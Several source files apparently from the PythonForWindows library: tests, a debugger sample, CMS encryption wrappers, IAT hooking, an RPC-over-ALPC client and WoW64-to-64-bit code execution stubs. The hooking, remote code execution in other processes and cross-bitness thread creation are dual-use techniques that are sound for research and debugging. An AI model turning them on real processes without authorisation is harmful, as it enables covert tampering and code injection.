result.add_field((tok_type, tok_name.value, nb_rep))
self.assert_token_type(CloseBracketToken)
if is_typedef:
self.parse_typedef(result)
else:
self.assert_token_type(SemiColonToken)
return result
def parse(self):
strucs = []
enums = []
while self.peek() is not None:
# HANDLE PRAGMA_PACK / PRAGMA_NOPACK
if type(self.peek()) == NameToken:
pragma = self.next_token().value
if pragma == "PRAGMA_NOPACK":
self.pack = None
continue
if pragma != "PRAGMA_PACK":
raise ValueError("Expected struct/union def or PRAGMA_[NO]PACK")
pack_value = self.promote_to_int(self.next_token())
self.pack = pack_value
x = self.parse_winstruct()
#x.packing = self.pack
#if x.packing != None:
# print("{0} pack = {1}".format(x.name, x.packing))
if type(x) == WinStruct or type(x) == WinUnion:
strucs.append(x)
elif type(x) == WinEnum:
enums.append(x)
else:
raise ValueError("Unknow returned type {0}".format(x))
return strucs, enums
class SimpleTypeDefine(object):
def __init__(self, lvalue, rvalue):
self.lvalue = lvalue
self.rvalue = rvalue
def generate_ctypes(self):
return "{self.lvalue} = {self.rvalue}".format(self=self)
class SimpleTypesParser(Parser):
def __init__(self, data):
self.lexer = iter(Lexer(self.initial_processing(data), newlinetoken=True))
self.peek_token = None
def parse(self):
results = []
while self.peek() is not None:
lvalue = self.assert_token_type(NameToken).value
self.assert_token_type(EqualToken)
rvalue = ""
while type(self.peek()) is not NewLineToken:
rvalue += self.next_token().value
results.append(SimpleTypeDefine(lvalue, rvalue))
while type(self.peek()) is NewLineToken: # discard the NewLineToken(s)
self.next_token()
return results
def dbg_lexer(data):
for i in Lexer(data).token_generation():
print i
def dbg_parser(data):
return WinStructParser(data).parse()
def dbg_validate(data):
return validate_structs(Parser(data).parse())
if __name__ == "__main__":
import sys
#data = open(sys.argv[1], 'r').read()
#ctypes_code = generate_ctypes(data)
```
#### File: samples/debug/local_debugger.py
```python
import sys
import os.path
import pprint
sys.path.append(os.path.abspath(__file__ + "\..\.."))
import windows
from windows.generated_def.winstructs import *
import windows.native_exec.simple_x86 as x86
class SingleSteppingDebugger(windows.debug.LocalDebugger):
SINGLE_STEP_COUNT = 4
def on_exception(self, exc):
code = self.get_exception_code()
context = self.get_exception_context()
print("EXCEPTION !!!! Got a {0} at 0x{1:x}".format(code, context.pc))
self.SINGLE_STEP_COUNT -= 1
if self.SINGLE_STEP_COUNT:
return self.single_step()
return EXCEPTION_CONTINUE_EXECUTION
class RewriteBreakpoint(windows.debug.HXBreakpoint):
def trigger(self, dbg, exc):
context = dbg.get_exception_context()
print("GOT AN HXBP at 0x{0:x}".format(context.pc))
# Rewrite the infinite loop with 2 nop
windows.current_process.write_memory(self.addr, "\x90\x90")
# Ask for a single stepping
return dbg.single_step()
d = SingleSteppingDebugger()
# Infinite loop + nop + ret
code = x86.assemble("label :begin; jmp :begin; nop; ret")
func = windows.native_exec.create_function(code, [PVOID])
print("Code addr = 0x{0:x}".format(func.code_addr))
# Create a thread that will infinite loop
t = windows.current_process.create_thread(func.code_addr, 0)
# Add a breakpoint on the infitine loop
d.add_bp(RewriteBreakpoint(func.code_addr))
t.wait()
print("Done!")
```
#### File: PythonForWindows/tests/test_system.py
```python
import pytest
import windows
from pfwtest import *
@check_for_gc_garbage
class TestSystemWithCheckGarbage(object):
def test_version(self):
return windows.system.version
def test_version_name(self):
return windows.system.version_name
def test_computer_name(self):
return windows.system.computer_name
def test_services(self):
return windows.system.services
def test_logicaldrives(self):
return windows.system.logicaldrives
def test_wmi(self):
return windows.system.wmi
def test_handles(self):
return windows.system.handles
def test_handle_process(self):
handle_with_process = [h for h in windows.system.handles if h.dwProcessId]
handle = handle_with_process[-1]
proc = handle.process
assert proc.pid == handle.dwProcessId
def test_system_modules_ntosk(self):
assert windows.system.modules[0].name.endswith("ntoskrnl.exe")
@check_for_gc_garbage
class TestSystemWithCheckGarbageAndHandleLeak(object):
def test_threads(self):
return windows.system.threads
def test_processes(self):
procs = windows.system.processes
assert windows.current_process.pid in [p.pid for p in procs]
def test_system_modules(self):
return windows.system.modules
```
#### File: PythonForWindows/tests/test_syswow.py
```python
import pytest
import textwrap
import windows
import windows.generated_def as gdef
import windows.native_exec.simple_x86 as x86
import windows.native_exec.simple_x64 as x64
from pfwtest import *
pytestmark = pytest.mark.usefixtures('check_for_gc_garbage')
@process_syswow_only
class TestSyswowCurrentProcess(object):
def test_exec_syswow(self):
x64_code = x64.assemble("mov rax, 0x4040404040404040; mov r11, 0x0202020202020202; add rax, r11; ret")
res = windows.syswow64.execute_64bits_code_from_syswow(x64_code)
assert res == 0x4242424242424242
def test_self_pebsyswow(self):
peb64 = windows.current_process.peb_syswow
modules_names = [m.name for m in peb64.modules]
assert "wow64.dll" in modules_names
# Parsing
wow64 = [m for m in peb64.modules if m.name == "wow64.dll"][0]
assert "Wow64LdrpInitialize" in wow64.pe.exports
@python_injection
@windows_64bit_only
class TestSyswowRemoteProcess(object):
def test_remote_pebsyswow(self, proc32):
peb64 = proc32.peb_syswow
modules_names = [m.name for m in peb64.modules]
assert "wow64.dll" in modules_names
# Parsing
wow64 = [m for m in peb64.modules if m.name == "wow64.dll"][0]
assert "Wow64LdrpInitialize" in wow64.pe.exports
def test_getset_syswow_context(self, proc32):
addr = proc32.virtual_alloc(0x1000)
remote_python_code = """
import windows
import windows.native_exec.simple_x64 as x64
windows.utils.create_console()
x64_code = x64.assemble("mov r11, 0x1122334455667788; mov rax, 0x8877665544332211; mov [{0}], rax ;label :loop; jmp :loop; nop; nop; ret")
res = windows.syswow64.execute_64bits_code_from_syswow(x64_code)
print("res = {{0}}".format(hex(res)))
windows.current_process.write_qword({0}, res)
""".format(addr)
t = proc32.execute_python_unsafe(textwrap.dedent(remote_python_code))
# Wait for python execution
while proc32.read_qword(addr) != 0x8877665544332211:
pass
ctx = t.context_syswow
# Check the get context
assert ctx.R11 == 0x1122334455667788
assert proc32.read_memory(ctx.Rip, 2) == x64.assemble("label :loop; jmp :loop")
t.suspend()
proc32.write_memory(ctx.Rip, "\x90\x90")
# Check the set context
RETURN_VALUE = 0x4041424344454647
ctx.Rax = RETURN_VALUE
ctx.Rip += 2
t.set_syswow_context(ctx)
t.resume()
t.wait()
assert RETURN_VALUE == proc32.read_qword(addr)
```
#### File: PythonForWindows/tests/test_wintrust.py
```python
import sys
import pytest
import windows
import windows.generated_def as gdef
from pfwtest import *
pytestmark = pytest.mark.usefixtures('check_for_gc_garbage')
def test_script_file_not_signed():
assert not windows.wintrust.is_signed(__file__)
assert windows.wintrust.check_signature(__file__) == gdef.TRUST_E_SUBJECT_FORM_UNKNOWN
def test_python_not_signed():
python_path = sys.executable
assert not windows.wintrust.is_signed(python_path)
assert windows.wintrust.check_signature(python_path) == gdef.TRUST_E_NOSIGNATURE
def test_kernel32_signed():
k32_path = r"C:\windows\system32\kernel32.dll"
assert windows.wintrust.is_signed(k32_path)
assert windows.wintrust.check_signature(k32_path) == 0
```
#### File: windows/crypto/encrypt_decrypt.py
```python
from os import urandom
from windows import winproxy
from windows.crypto import DEFAULT_ENCODING
from windows.generated_def import *
__all__ = ["encrypt", "decrypt"]
def encode_init_vector(data):
blob = CRYPT_DATA_BLOB.from_string(data)
size = DWORD()
buf = None
winproxy.CryptEncodeObjectEx(DEFAULT_ENCODING, X509_OCTET_STRING, ctypes.byref(blob), 0, None, buf, size)
buf = (BYTE * size.value)()
winproxy.CryptEncodeObjectEx(DEFAULT_ENCODING, X509_OCTET_STRING, ctypes.byref(blob), 0, None, buf, size)
return buf[:]
class GenerateInitVector(object):
def __repr__(self):
return "GenerateInitVector()"
def generate_init_vector(self, algo):
if algo in [szOID_OIWSEC_desCBC, szOID_RSA_DES_EDE3_CBC]:
return urandom(8)
if algo in [szOID_NIST_AES128_CBC, szOID_NIST_AES192_CBC, szOID_NIST_AES256_CBC]:
return urandom(16)
return None
geninitvector = GenerateInitVector()
def encrypt(cert_or_certlist, msg, algo=szOID_NIST_AES256_CBC, initvector=geninitvector):
"""Encrypt ``msg`` one or many :class:`Certificate` using ``algo`` with the initial
vector ``initvector``.
If ``geninitvector`` is left as it is, it will generate a random one.
Algorithms supported by ``GenerateInitVector`` are:
* ``szOID_OIWSEC_desCBC``
* ``szOID_RSA_DES_EDE3_CBC``
* ``szOID_NIST_AES128_CBC``
* ``szOID_NIST_AES192_CBC``
* ``szOID_NIST_AES256_CBC``
:param cert_or_certlist: One or many :class:`Certificate` used to encrypt the msg
:type cert_or_certlist: :class:`Certificate` | [:class:`Certificate`]
:return: :class:`bytearray`: The encrypted message
"""
alg_ident = CRYPT_ALGORITHM_IDENTIFIER()
alg_ident.pszObjId = algo
# We want to have automatique translation of Certificate -> PCERT_CONTEXT
# In order to simple create the 'PCERT_CONTEXT[] certs'
# For that we need a tuple of X * 1-item-tuple
# as a (cert,) will be automaticly translatable to a PCERT_CONTEXT
if isinstance(cert_or_certlist, CERT_CONTEXT):
certlist = ((cert_or_certlist,),)
else:
certlist = tuple((c,) for c in cert_or_certlist)
# Set (compute if needed) the IV
if initvector is None:
alg_ident.Parameters.cbData = 0
elif initvector is geninitvector:
initvector = initvector.generate_init_vector(algo)
if initvector is None:
raise ValueError("I don't know how to generate an <initvector> for <{0}> please provide one (or None)".format(algo))
initvector_encoded = encode_init_vector(initvector)
alg_ident.Parameters = CRYPT_DATA_BLOB.from_string(initvector_encoded)
else:
initvector_encoded = encode_init_vector(initvector)
alg_ident.Parameters = CRYPT_DATA_BLOB.from_string(initvector_encoded)
# Setup encryption parameters
param = CRYPT_ENCRYPT_MESSAGE_PARA()
param.cbSize = ctypes.sizeof(param)
param.dwMsgEncodingType = DEFAULT_ENCODING
param.hCryptProv = None
param.ContentEncryptionAlgorithm = alg_ident
param.pvEncryptionAuxInfo = None
param.dwFlags = 0
param.dwInnerContentType = 0
certs = (PCERT_CONTEXT * len(certlist))(*certlist)
#Ask the output buffer size
size = DWORD()
winproxy.CryptEncryptMessage(param, len(certs), certs, msg, len(msg), None, size)
#Encrypt the msg
buf = (BYTE * size.value)()
winproxy.CryptEncryptMessage(param, len(certs), certs, msg, len(msg), buf, size)
return bytearray(buf[:size.value])
def decrypt(cert_store, encrypted):
"""Try to decrypt the ``encrypted`` msg with any certificate in ``cert_store``.
If there is no certificate able to decrypt the message ``WinproxyError(winerror=0x8009200c)`` is raised.
:param cert_store:
:type cert_store: :class:`CertificateStore`
:return: :class:`str`: The decrypted message
"""
# Setup decryption parameters
dparam = CRYPT_DECRYPT_MESSAGE_PARA()
dparam.cbSize = ctypes.sizeof(dparam)
dparam.dwMsgAndCertEncodingType = DEFAULT_ENCODING
dparam.cCertStore = 1
dparam.rghCertStore = (cert_store,)
dparam.dwFlags = 0
#Ask the output buffer size
buf = (BYTE * len(encrypted)).from_buffer_copy(encrypted)
dcryptsize = DWORD()
winproxy.CryptDecryptMessage(dparam, buf, ctypes.sizeof(buf), None, dcryptsize, None)
#Decrypt the msg
dcryptbuff = (BYTE * dcryptsize.value)()
winproxy.CryptDecryptMessage(dparam, buf, ctypes.sizeof(buf), dcryptbuff, dcryptsize, None)
return str(bytearray(dcryptbuff[:dcryptsize.value]))
```
#### File: PythonForWindows/windows/hooks.py
```python
import sys
import ctypes
import windows
import windows.utils as utils
from . import native_exec
from .generated_def import winfuncs
from .generated_def.windef import PAGE_EXECUTE_READWRITE
from .generated_def.winstructs import *
# TODO Not a big fan of importing 'meta' every load
# Should do an Hook API that take the winproxy function (not generate every hook possible)
import windows.generated_def.meta
class Callback(object):
"""Give type information to hook callback"""
def __init__(self, *types):
self.types = types
def __call__(self, func):
func._types_info = self.types
return func
class KnownCallback(object):
types = ()
def __call__(self, func):
func._types_info = self.types
return func
def add_callback_to_module(callback):
setattr(sys.modules[__name__], type(callback).__name__, callback)
# Generate IATCallback decorator for all known functions
for func in windows.generated_def.meta.functions:
prototype = getattr(winfuncs, func + "Prototype")
callback_name = func + "Callback"
class CallBackDeclaration(KnownCallback):
types = (prototype._restype_,) + prototype._argtypes_
CallBackDeclaration.__name__ = callback_name
add_callback_to_module(CallBackDeclaration())
class IATHook(object):
"""Look at my hook <3"""
yolo = []
def __init__(self, IAT_entry, callback, types=None):
if types is None:
if not hasattr(callback, "_types_info"):
raise ValueError("Callback for IATHook has no type infomations")
types = callback._types_info
self.original_types = types
self.callback_types = self.transform_arguments(self.original_types)
self.entry = IAT_entry
self.callback = callback
self.stub = ctypes.WINFUNCTYPE(*self.callback_types)(self.hook_callback)
self.stub_addr = ctypes.cast(self.stub, PVOID).value
self.realfunction = ctypes.WINFUNCTYPE(*types)(IAT_entry.nonhookvalue)
self.is_enable = False
#IATHook.yolo.append(self)
def transform_arguments(self, types):
res = []
for type in types:
if type in (ctypes.c_wchar_p, ctypes.c_char_p):
res.append(ctypes.c_void_p)
else:
res.append(type)
return res
def enable(self):
"""Enable the IAT hook: you MUST keep a reference to the IATHook while the hook is enabled"""
with utils.VirtualProtected(self.entry.addr, ctypes.sizeof(PVOID), PAGE_EXECUTE_READWRITE):
self.entry.value = self.stub_addr
self.is_enable = True
def disable(self):
"""Disable the IAT hook"""
with utils.VirtualProtected(self.entry.addr, ctypes.sizeof(PVOID), PAGE_EXECUTE_READWRITE):
self.entry.value = self.entry.nonhookvalue
self.is_enable = False
def hook_callback(self, *args):
adapted_args = []
for value, type in zip(args, self.original_types[1:]):
if type == ctypes.c_wchar_p:
adapted_args.append(ctypes.c_wchar_p(value))
elif type == ctypes.c_char_p:
adapted_args.append(ctypes.c_char_p((value)))
else:
adapted_args.append(value)
def real_function(*args):
if args == ():
args = adapted_args
return self.realfunction(*args)
return self.callback(*adapted_args, real_function=real_function)
# Use this tricks to prevent garbage collection of hook ?
#def __del__(self):
# pass
## New simple hook API based on winproxy
def setup_hook(target, hook, dll_to_hook):
"TODO: Test and doc :D"
dll_name, api_name = windows.winproxy.get_target(target)
prototype = target.prototype
hook._types_info = (prototype._restype_,) + prototype._argtypes_
if not dll_name.endswith(".dll"):
dll_name += ".dll"
# Get the peb of our process
peb = windows.current_process.peb
# Get the dll_to_hook
module_to_hook = [m for m in peb.modules if m.name.lower() == dll_to_hook.lower()][0]
# Get the iat entries for DLL dll_name
adv_imports = module_to_hook.pe.imports[dll_name]
# Get RegOpenKeyExA iat entry
iat = [n for n in adv_imports if n.name == api_name][0]
iat.set_hook(hook)
return iat
```
#### File: windows/rpc/client.py
```python
import ctypes
import struct
import windows.alpc as alpc
import windows.com
import windows.generated_def as gdef
KNOW_REQUEST_TYPE = gdef.FlagMapper(gdef.RPC_REQUEST_TYPE_CALL, gdef.RPC_REQUEST_TYPE_BIND)
KNOW_RESPONSE_TYPE = gdef.FlagMapper(gdef.RPC_RESPONSE_TYPE_FAIL, gdef.RPC_RESPONSE_TYPE_SUCCESS, gdef.RPC_RESPONSE_TYPE_BIND_OK)
KNOWN_RPC_ERROR_CODE = gdef.FlagMapper(
gdef.ERROR_INVALID_HANDLE,
gdef.RPC_X_BAD_STUB_DATA,
gdef.RPC_S_UNKNOWN_IF,
gdef.RPC_S_PROTOCOL_ERROR,
gdef.RPC_S_UNSUPPORTED_TRANS_SYN,
gdef.RPC_S_PROCNUM_OUT_OF_RANGE)
NOT_USED = 0xBAADF00D
class ALPC_RPC_BIND(ctypes.Structure):
_pack_ = 1
_fields_ = [
("request_type", gdef.DWORD),
("UNK1", gdef.DWORD),
("UNK2", gdef.DWORD),
("target", gdef.RPC_IF_ID),
("flags", gdef.DWORD),
("if_nb_ndr32", gdef.USHORT),
("if_nb_ndr64", gdef.USHORT),
("if_nb_unkn", gdef.USHORT),
("PAD", gdef.USHORT),
("register_multiple_syntax", gdef.DWORD),
("use_flow", gdef.DWORD),
("UNK5", gdef.DWORD),
("maybe_flow_id", gdef.DWORD),
("UNK7", gdef.DWORD),
("some_context_id", gdef.DWORD),
("UNK9", gdef.DWORD),
]
class ALPC_RPC_CALL(ctypes.Structure):
_pack_ = 1
_fields_ = [
("request_type", gdef.DWORD),
("UNK1", gdef.DWORD),
("flags",gdef.DWORD),
("request_id", gdef.DWORD),
("if_nb", gdef.DWORD),
("method_offset", gdef.DWORD),
("UNK2", gdef.DWORD),
("UNK3", gdef.DWORD),
("UNK4", gdef.DWORD),
("UNK5", gdef.DWORD),
("UNK6", gdef.DWORD),
("UNK7", gdef.DWORD),
("UNK8", gdef.DWORD),
("UNK9", gdef.DWORD),
("UNK10", gdef.DWORD),
("UNK11", gdef.DWORD),
]
class RPCClient(object):
"""A client for RPC-over-ALPC able to bind to interface and perform calls using NDR32 marshalling"""
REQUEST_IDENTIFIER = 0x11223344
def __init__(self, port):
self.alpc_client = alpc.AlpcClient(port)
self.number_of_bind_if = 0 # if -> interface
self.if_bind_number = {}
def bind(self, IID_str, version=(1,0)):
"""Bind to the ``IID_str`` with the given ``version``
:returns: :class:`windows.generated_def.IID`
"""
IID = windows.com.IID.from_string(IID_str)
request = self._forge_bind_request(IID, version, self.number_of_bind_if)
response = self._send_request(request)
# Parse reponse
request_type = self._get_request_type(response)
if request_type != gdef.RPC_RESPONSE_TYPE_BIND_OK:
raise ValueError("Unexpected reponse type. Expected RESPONSE_TYPE_BIND_OK got {0}".format(KNOW_RESPONSE_TYPE[request_type]))
iid_hash = hash(buffer(IID)[:]) # TODO: add __hash__ to IID
self.if_bind_number[iid_hash] = self.number_of_bind_if
self.number_of_bind_if += 1
#TODO: attach version information to IID
return IID
def call(self, IID, method_offset, params):
"""Call method number ``method_offset`` of interface ``IID`` with mashalled ``params``
:param IID IID: An IID previously returned by :func:`bind`
:param int method_offset:
:param str params: The mashalled parameters (NDR32)
:returns: :class:`str`
"""
iid_hash = hash(buffer(IID)[:])
interface_nb = self.if_bind_number[iid_hash] # TODO: add __hash__ to IID
request = self._forge_call_request(interface_nb, method_offset, params)
response = self._send_request(request)
# Parse reponse
request_type = self._get_request_type(response)
if request_type != gdef.RPC_RESPONSE_TYPE_SUCCESS:
raise ValueError("Unexpected reponse type. Expected RESPONSE_SUCCESS got {0}".format(KNOW_RESPONSE_TYPE[request_type]))
data = struct.unpack("<6I", response[:6 * 4])
assert data[3] == self.REQUEST_IDENTIFIER
return response[4 * 6:] # Should be the return value (not completly verified)
def _send_request(self, request):
response = self.alpc_client.send_receive(request)
return response.data
def _forge_call_request(self, interface_nb, method_offset, params):
# TODO: differents REQUEST_IDENTIFIER for each req ?
# TODO: what is this '0' ? (1 is also accepted) (flags ?)
# request = struct.pack("<16I", gdef.RPC_REQUEST_TYPE_CALL, NOT_USED, 1, self.REQUEST_IDENTIFIER, interface_nb, method_offset, *[NOT_USED] * 10)
req = ALPC_RPC_CALL()
req.request_type = gdef.RPC_REQUEST_TYPE_CALL
req.flags = 0
req.request_id = self.REQUEST_IDENTIFIER
req.if_nb = interface_nb
req.method_offset = method_offset
return buffer(req)[:] + params
def _forge_bind_request(self, uuid, syntaxversion, requested_if_nb):
version_major, version_minor = syntaxversion
req = ALPC_RPC_BIND()
req.request_type = gdef.RPC_REQUEST_TYPE_BIND
req.target = gdef.RPC_IF_ID(uuid, *syntaxversion)
req.flags = gdef.BIND_IF_SYNTAX_NDR32
# req.flags = gdef.BIND_IF_SYNTAX_NDR64
req.if_nb_ndr32 = requested_if_nb
req.if_nb_ndr64 = 0
req.if_nb_ndr64 = requested_if_nb
req.if_nb_unkn = 0
req.register_multiple_syntax = False
req.some_context_id = 0xB00B00B
return buffer(req)[:]
def _get_request_type(self, response):
"raise if request_type == RESPONSE_TYPE_FAIL"
request_type = struct.unpack("<I", response[:4])[0]
if request_type == gdef.RPC_RESPONSE_TYPE_FAIL:
error_code = struct.unpack("<5I", response)[2]
raise ValueError("RPC Response error {0} ({1})".format(error_code, KNOWN_RPC_ERROR_CODE.get(error_code, error_code)))
return request_type
```
#### File: PythonForWindows/windows/syswow64.py
```python
import struct
import ctypes
from ctypes import byref
import codecs
import functools
import windows
import windows.native_exec.simple_x86 as x86
import windows.native_exec.simple_x64 as x64
from generated_def.winstructs import *
from windows.winobject import process
from windows import winproxy
from winproxy import NeededParameter
# Special code for syswow64 process
CS_32bits = 0x23
CS_64bits = 0x33
def generate_64bits_execution_stub_from_syswow(x64shellcode):
"""shellcode must NOT end by a ret"""
current_process = windows.current_process
if not current_process.is_wow_64:
raise ValueError("Calling generate_64bits_execution_stub_from_syswow from non-syswow process")
transition64 = x64.MultipleInstr()
transition64 += x64.Call(":TOEXEC")
transition64 += x64.Mov("RDX", "RAX")
transition64 += x64.Shr("RDX", 32)
transition64 += x64.Retf32() # 32 bits return addr
transition64 += x64.Label(":TOEXEC")
x64shellcodeaddr = windows.current_process.allocator.write_code(transition64.get_code() + x64shellcode)
transition = x86.MultipleInstr()
transition += x86.Call(CS_64bits, x64shellcodeaddr)
transition += x86.Ret()
stubaddr = windows.current_process.allocator.write_code(transition.get_code())
exec_stub = ctypes.CFUNCTYPE(ULONG64)(stubaddr)
return exec_stub
def execute_64bits_code_from_syswow(x64shellcode):
return generate_64bits_execution_stub_from_syswow(x64shellcode)()
def generate_syswow64_call(target, errcheck=None):
nb_args = len(target.prototype._argtypes_)
target_addr = get_syswow_ntdll_exports()[target.__name__]
argument_buffer_len = (nb_args * 8)
argument_buffer = windows.current_process.allocator.reserve_size(argument_buffer_len)
alignement_information = windows.current_process.allocator.reserve_size(8)
nb_args_on_stack = max(nb_args - 4, 0)
code_64b = x64.MultipleInstr()
# Save registers
code_64b += x64.Push('RBX')
code_64b += x64.Push('RCX')
code_64b += x64.Push('RDX')
code_64b += x64.Push('RSI')
code_64b += x64.Push('RDI')
code_64b += x64.Push('R8')
code_64b += x64.Push('R9')
code_64b += x64.Push('R10')
code_64b += x64.Push('R11')
code_64b += x64.Push('R12')
code_64b += x64.Push('R13')
# Alignment stuff :)
code_64b += x64.Mov('RCX', 'RSP')
code_64b += x64.And('RCX', 0x0f)
code_64b += x64.Mov(x64.deref(alignement_information), 'RCX')
code_64b += x64.Sub('RSP', 'RCX')
# retrieve argument from the argument buffer
if nb_args >= 1:
code_64b += x64.Mov('RCX', x64.create_displacement(disp=argument_buffer))
if nb_args >= 2:
code_64b += x64.Mov('RDX', x64.create_displacement(disp=argument_buffer + (8 * 1)))
if nb_args >= 3:
code_64b += x64.Mov('R8', x64.create_displacement(disp=argument_buffer + (8 * 2)))
if nb_args >= 4:
code_64b += x64.Mov('R9', x64.create_displacement(disp=argument_buffer + (8 * 3)))
for i in range(nb_args_on_stack):
code_64b += x64.Mov('RAX', x64.create_displacement(disp=argument_buffer + 8 * (nb_args - 1 - i)))
code_64b += x64.Push('RAX')
# reserve space for register (calling convention)
code_64b += x64.Push('R9')
code_64b += x64.Push('R8')
code_64b += x64.Push('RDX')
code_64b += x64.Push('RCX')
# Call
code_64b += x64.Mov('R13', target_addr)
code_64b += x64.Call('R13')
# Realign stack :)
code_64b += x64.Add('RSP', x64.deref(alignement_information))
# Clean stack
code_64b += x64.Add('RSP', (4 + nb_args_on_stack) * 8)
code_64b += x64.Pop('R13')
code_64b += x64.Pop('R12')
code_64b += x64.Pop('R11')
code_64b += x64.Pop('R10')
code_64b += x64.Pop('R9')
code_64b += x64.Pop('R8')
code_64b += x64.Pop('RDI')
code_64b += x64.Pop('RSI')
code_64b += x64.Pop('RDX')
code_64b += x64.Pop('RCX')
code_64b += x64.Pop('RBX')
code_64b += x64.Ret()
return try_generate_stub_target(code_64b.get_code(), argument_buffer, target, errcheck=errcheck)
def try_generate_stub_target(shellcode, argument_buffer, target, errcheck=None):
if not windows.current_process.is_wow_64:
raise ValueError("Calling execute_64bits_code_from_syswow from non-syswow process")
native_caller = generate_64bits_execution_stub_from_syswow(shellcode)
native_caller.errcheck = errcheck if errcheck is not None else target.errcheck
# Generate the wrapper function that fill the argument_buffer
expected_arguments_number = len(target.prototype._argtypes_)
def wrapper(*args):
if len(args) != expected_arguments_number:
raise ValueError("{0} syswow accept {1} args ({2} given)".format(target.__name__, expected_arguments_number, len(args)))
# Transform args (ctypes byref possibly) to int
writable_args = []
for i, value in enumerate(args):
if not isinstance(value, (int, long)):
try:
value = ctypes.cast(value, ctypes.c_void_p).value
except ctypes.ArgumentError as e:
raise ctypes.ArgumentError("Argument {0}: wrong type <{1}>".format(i, type(value).__name__))
writable_args.append(value)
# Build buffer
buffer = struct.pack("<" + "Q" * len(writable_args), *writable_args)
ctypes.memmove(argument_buffer, buffer, len(buffer))
# Copy origincal args in function, for errcheck if needed
native_caller.current_original_args = args # TODO: THIS IS NOT THREAD SAFE
return native_caller()
wrapper.__name__ = "{0}<syswow64>".format(target.__name__,)
wrapper.__doc__ = "This is a wrapper to {0} in 64b mode, it accept <{1}> args".format(target.__name__, expected_arguments_number)
return wrapper
def get_current_process_syswow_peb_addr():
get_peb_64_code = x64.assemble("mov rax, gs:[0x60]; ret")
return execute_64bits_code_from_syswow(get_peb_64_code)
def get_current_process_syswow_peb():
current_process = windows.current_process
class CurrentProcessReadSyswow(process.Process):
bitness = 64
def _get_handle(self):
return winproxy.OpenProcess(dwProcessId=current_process.pid)
def read_memory(self, addr, size):
buffer_addr = ctypes.create_string_buffer(size)
winproxy.NtWow64ReadVirtualMemory64(self.handle, addr, buffer_addr, size)
return buffer_addr[:]
peb_addr = get_current_process_syswow_peb_addr()
return windows.winobject.process.RemotePEB64(peb_addr, CurrentProcessReadSyswow())
class ReadSyswow64Process(process.Process):
def __init__(self, target):
self.target = target
self._bitness = target.bitness
def _get_handle(self):
return self.target.handle
def read_memory(self, addr, size):
buffer_addr = ctypes.create_string_buffer(size)
winproxy.NtWow64ReadVirtualMemory64(self.target.handle, addr, buffer_addr, size)
return buffer_addr[:]
#read_string = process.Process.read_string
def get_syswow_ntdll_exports():
if get_syswow_ntdll_exports.value is not None:
return get_syswow_ntdll_exports.value
peb64 = get_current_process_syswow_peb()
ntdll64 = [m for m in peb64.modules if m.name == "ntdll.dll"]
if not ntdll64:
raise ValueError("Could not find ntdll.dll in syswow peb")
ntdll64 = ntdll64[0]
exports = ntdll64.pe.exports
get_syswow_ntdll_exports.value = exports
return exports
get_syswow_ntdll_exports.value = None
class Syswow64ApiProxy(object):
"""Create a python wrapper around a function"""
def __init__(self, winproxy_function, errcheck=None):
self.winproxy_function = winproxy_function
self.raw_call = None
self.errcheck = errcheck
if winproxy_function is not None:
self.params_name = [param[1] for param in winproxy_function.params]
def __call__(self, python_proxy):
if not windows.winproxy.is_implemented(self.winproxy_function):
return None
def force_resolution():
if self.raw_call:
return True
try:
self.raw_call = generate_syswow64_call(self.winproxy_function, errcheck=self.errcheck)
except KeyError:
raise windows.winproxy.ExportNotFound(self.winproxy_function.__name__, "SysWow[ntdll64]")
def perform_call(*args):
if len(self.params_name) != len(args):
print("ERROR:")
print("Expected params: {0}".format(self.params_name))
print("Just Got params: {0}".format(args))
raise ValueError("I do not have all parameters: how is that possible ?")
for param_name, param_value in zip(self.params_name, args):
if param_value is NeededParameter:
raise TypeError("{0}: Missing Mandatory parameter <{1}>".format(self.winproxy_function.__name__, param_name))
if self.raw_call is None:
force_resolution()
return self.raw_call(*args)
setattr(python_proxy, "ctypes_function", perform_call)
setattr(python_proxy, "force_resolution", force_resolution)
return python_proxy
def ntquerysysteminformation_syswow64_error_check(result, func, args):
args = func.current_original_args
if result == 0:
return args
# Ignore STATUS_INFO_LENGTH_MISMATCH if SystemInformation is None
if result == STATUS_INFO_LENGTH_MISMATCH and not args[1]:
return args
raise WinproxyError("{0} failed with NTStatus {1}".format(func_name, hex(result)))
@Syswow64ApiProxy(winproxy.NtQuerySystemInformation, errcheck=ntquerysysteminformation_syswow64_error_check)
# @Syswow64ApiProxy(winproxy.NtQuerySystemInformation)
def NtQuerySystemInformation_32_to_64(SystemInformationClass, SystemInformation=None, SystemInformationLength=0, ReturnLength=NeededParameter):
if SystemInformation is not None and SystemInformationLength == 0:
SystemInformationLength = ctypes.sizeof(SystemInformation)
if SystemInformation is None:
SystemInformation = 0
return NtQuerySystemInformation_32_to_64.ctypes_function(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength)
@Syswow64ApiProxy(winproxy.NtCreateThreadEx)
def NtCreateThreadEx_32_to_64(ThreadHandle=None, DesiredAccess=0x1fffff, ObjectAttributes=0, ProcessHandle=NeededParameter, lpStartAddress=NeededParameter, lpParameter=NeededParameter, CreateSuspended=0, dwStackSize=0, Unknown1=0, Unknown2=0, Unknown3=0):
if ThreadHandle is None:
ThreadHandle = byref(HANDLE())
return NtCreateThreadEx_32_to_64.ctypes_function(ThreadHandle, DesiredAccess, ObjectAttributes, ProcessHandle, lpStartAddress, lpParameter, CreateSuspended, dwStackSize, Unknown1, Unknown2, Unknown3)
ProcessBasicInformation = 0
@Syswow64ApiProxy(winproxy.NtQueryInformationProcess)
def NtQueryInformationProcess_32_to_64(ProcessHandle, ProcessInformationClass=ProcessBasicInformation, ProcessInformation=NeededParameter, ProcessInformationLength=0, ReturnLength=None):
if ProcessInformation is not None and ProcessInformationLength == 0:
ProcessInformationLength = ctypes.sizeof(ProcessInformation)
if type(ProcessInformation) == PROCESS_BASIC_INFORMATION:
ProcessInformation = byref(ProcessInformation)
if ReturnLength is None:
ReturnLength = byref(ULONG())
return NtQueryInformationProcess_32_to_64.ctypes_function(ProcessHandle, ProcessInformationClass, ProcessInformation, ProcessInformationLength, ReturnLength)
@Syswow64ApiProxy(winproxy.NtQueryInformationThread)
def NtQueryInformationThread_32_to_64(ThreadHandle, ThreadInformationClass, ThreadInformation, ThreadInformationLength=0, ReturnLength=None):
if ReturnLength is None:
ReturnLength = byref(ULONG())
if ThreadInformation is not None and ThreadInformationLength == 0:
ThreadInformationLength = ctypes.sizeof(ThreadInformation)
return NtQueryInformationThread_32_to_64.ctypes_function(ThreadHandle, ThreadInformationClass, ThreadInformation, ThreadInformationLength, ReturnLength)
